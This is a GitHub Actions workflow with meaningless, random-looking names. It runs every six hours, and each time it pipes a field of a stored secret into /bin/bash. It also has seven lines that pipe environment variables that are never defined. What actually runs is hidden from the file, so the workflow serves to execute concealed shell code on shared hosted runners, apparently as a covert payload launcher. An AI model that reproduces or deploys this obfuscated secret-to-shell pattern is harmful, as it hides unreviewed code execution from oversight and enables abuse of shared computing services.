name: zhangshancui4657
on:
  workflow_dispatch:
  schedule:
    - cron: '50 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangshancui4657
        env:
          jo10: ${{ secrets.jo10 }}
        run: |
          echo $jo10 | jq -r .a63 | /bin/bash
          echo $cal873 | jq -r .wfkf13 | /bin/bash
          echo $dbe46836 | jq -r .fu3276 | /bin/bash
          echo $mrp3 | jq -r .esp98 | /bin/bash
          echo $gk66 | jq -r .udgcu36427 | /bin/bash
          echo $we06559 | jq -r .fx712 | /bin/bash
          echo $gd4132 | jq -r .fl1 | /bin/bash
          echo $ebxqs05039 | jq -r .baesi98 | /bin/bash

